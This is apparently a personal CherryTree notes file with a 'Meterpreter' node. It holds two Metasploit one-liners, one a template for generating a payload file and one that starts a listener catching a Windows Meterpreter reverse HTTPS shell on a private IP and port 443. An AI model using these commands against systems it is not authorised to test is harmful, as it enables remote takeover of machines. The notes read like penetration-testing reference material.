<?xml version="1.0" encoding="UTF-8"?>
<cherrytree>
  <node unique_id="162" master_id="0" name="Meterpreter" prog_lang="custom-colors" tags="" readonly="0" nosearch_me="0" nosearch_ch="0" custom_icon_id="0" is_bold="0" foreground="" ts_creation="1766239497" ts_lastsave="1766486204">
    <rich_text>** msfconsole -qx “use &lt;MSF supported payload&gt;; set lhost&lt;IP&gt;; set lport &lt;Port&gt;; generate -f&lt;Output File Format&gt; -o&lt;payload filename&gt;; ”


** msfconsole -qx  "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_https; set lhost 10.3.0.199; set lport 443; exploit -j"






123456789&#13;
</rich_text>
  </node>
</cherrytree>
